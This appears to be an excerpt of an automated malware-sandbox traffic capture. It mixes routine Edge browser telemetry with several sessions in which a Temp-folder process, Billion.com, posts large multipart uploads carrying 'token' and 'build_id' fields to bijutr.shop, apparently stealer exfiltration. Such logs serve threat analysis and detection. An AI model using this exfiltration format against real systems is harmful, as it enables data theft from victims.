                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 27 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom'Pc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 49995 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:29 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----NGVAAIE3W4EU37YMYCB1
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 207993
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4e 47 56 41 41 49 45 33 57 34 45 55 33 37 59 4d 59 43 42 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------NGVAAIE3W4EU37YMYCB1Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------NGVAAIE3W4EU37YMYCB1Cont
2024-12-24 18:28:31 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.6 | 49998 | 172.64.41.3 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:29 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-24 18:28:29 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-24 18:28:30 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Tue, 24 Dec 2024 18:28:29 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f72a6c72d5a42bb-EWR
alt-svc: h3=":443"; ma=86400
2024-12-24 18:28:30 UTC | 468 | IN | Data Ascii: wwwgstaticcom()


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.6 | 50011 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:31 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q90R90ZMOZUAIMGDJMOZ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:31 UTC | 16355 | OUT | Data Ascii: ------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------Q90R90ZMOZUAIMGDJMOZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q90R90ZMOZUAIMGDJMOZCont
2024-12-24 18:28:33 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 24 Dec 2024 18:28:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-24 18:28:33 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.6 | 50022 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com

Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:34 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----MYUKN7900ZU37YMY5FK6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:34 UTC | 16355 | OUT | Data Ascii: ------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------MYUKN7900ZU37YMY5FK6Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------MYUKN7900ZU37YMY5FK6Cont
2024-12-24 18:28:36 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.6 | 49982 | 18.161.69.30 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:35 UTC | 925 | OUT | GET /b?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-24 18:28:35 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:35 GMT
                                                                                                                                                                                                                                                                                                        Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                        Location: /b2?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                        set-cookie: UID=100b66b45e7bac3f3b14d5f1735064915; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                        set-cookie: XID=100b66b45e7bac3f3b14d5f1735064915; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                        Via: 1.1 28ccd2b47efede79124bdab295098b70.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                                                                                                                                                                                        X-Amz-Cf-Id: 1H7ZrcqQVVFop8LiVFBTTM2UQxG4KoFjx9aZsoA847oa5pxKP1MIjQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.6 | 50029 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:35 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----0RQI5FKFUSJMYU379R90
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 393697
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
2024-12-24 18:28:35 UTC | 16355 | OUT | Data Ascii:
------0RQI5FKFUSJMYU379R90
Content-Disposition: form-data; name="token"

259654c3bcc7330e1954cafd3454ec44
------0RQI5FKFUSJMYU379R90
Content-Disposition: form-data; name="build_id"

c1400f115131e1fa84ea98599d53d0bd
------0RQI5FKFUSJMYU379R90
Cont
2024-12-24 18:28:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:37 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.6 | 50040 | 20.189.173.2 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:37 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064913988&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 3822
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1
2024-12-24 18:28:37 UTC | 3822 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-24T18:28:33.983Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
2024-12-24 18:28:38 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=4c8098aae4df49a5a4e63c09634affb1&HASH=4c80&LV=202412&V=4&LU=1735064918265; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=cd3cf7005c3a42a4bb8df4ab45e9d7a0; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 4277
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:38 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50047 | 18.238.49.124 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:37 UTC | 1012 | OUT | GET /b2?rn=1735064913991&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=302665E99E416E3C182470B69FCB6F6B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
Host: sb.scorecardresearch.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: UID=100b66b45e7bac3f3b14d5f1735064915; XID=100b66b45e7bac3f3b14d5f1735064915
2024-12-24 18:28:37 UTC | 326 | IN | HTTP/1.1 204 No Content
Connection: close
Date: Tue, 24 Dec 2024 18:28:37 GMT
Accept-CH: UA, Platform, Arch, Model, Mobile
X-Cache: Miss from cloudfront
Via: 1.1 b15f339834cfb5119481b1c1eb890372.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: JFK52-P3
X-Amz-Cf-Id: pRkdKf8AP0VQLsg_e3xqkigs6iIBze5hsL3AWEL6VtsuQ_qKE03SMg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50050 | 20.110.205.119 | 443 | 7060 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:37 UTC | 1261 | OUT | GET /c.gif?rnd=1735064913990&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=25e0b3e5ef394e87be94b037e6030b83&activityId=25e0b3e5ef394e87be94b037e6030b83&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B84458BB52864B9C8B94F9F4ABBF5707&MUID=302665E99E416E3C182470B69FCB6F6B HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; SM=T
2024-12-24 18:28:38 UTC | 982 | IN | HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: image/gif
Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
Accept-Ranges: bytes
ETag: "9270eb7934bdb1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=302665E99E416E3C182470B69FCB6F6B; domain=.msn.com; expires=Sun, 18-Jan-2026 18:28:38 GMT; path=/; SameSite=None; Secure; Priority=High;
Set-Cookie: SRM_M=302665E99E416E3C182470B69FCB6F6B; domain=c.msn.com; expires=Sun, 18-Jan-2026 18:28:38 GMT; path=/; SameSite=None; Secure;
Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 31-Dec-2024 18:28:38 GMT; path=/; SameSite=None; Secure;
Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 24-Dec-2024 18:38:38 GMT; path=/; SameSite=None; Secure;
Date: Tue, 24 Dec 2024 18:28:37 GMT
Connection: close
Content-Length: 42
2024-12-24 18:28:38 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50051 | 188.245.216.205 | 443 | 1396 | C:\Users\user\AppData\Local\Temp\680662\Billion.com
Timestamp | Bytes transferred | Direction | Data
2024-12-24 18:28:37 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WLFCTJWTJW4EU37QIE37
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-24 18:28:37 UTC | 16355 | OUT | Data Ascii: ------WLFCTJWTJW4EU37QIE37Content-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------WLFCTJWTJW4EU37QIE37Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------WLFCTJWTJW4EU37QIE37Cont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
